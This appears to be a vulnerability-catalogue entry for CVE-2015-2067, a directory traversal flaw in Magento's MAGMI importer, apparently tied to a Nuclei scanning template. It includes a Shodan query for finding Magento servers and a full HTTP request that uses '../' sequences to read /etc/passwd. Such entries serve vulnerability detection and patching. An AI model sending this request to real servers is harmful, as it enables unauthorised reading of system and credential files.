| Title | Magento Server MAGMI - Directory Traversal |
|---|---|
| Author | daffainfo |
| Severity | Medium |
| Impact | An attacker can exploit this vulnerability to read arbitrary files on the server. |
| Remediation | Apply the latest security patches and updates provided by Magento. |
| CVSS Score | 5 |
| EPSS Score | 0.82764 |
| CVE ID | CVE-2015-2067 |
| CWE ID | CWE-22 |
| Shodan Query | http.component:"Magento"http.component:"magento" |
| Tags | cve2015 cve plugin edb packetstorm lfi magento magmi magmi_project magento_server vkev vuln |
Magento Server MAGMI (aka Magento Mass Importer) contains a directory traversal vulnerability in web/ajax_pluginconf.php. that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
GET /magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2015/CVE-2015-2067.yaml
🦈 Packet Capture: ⬇️ Download cve-2015-2067.pcap
N/AN/A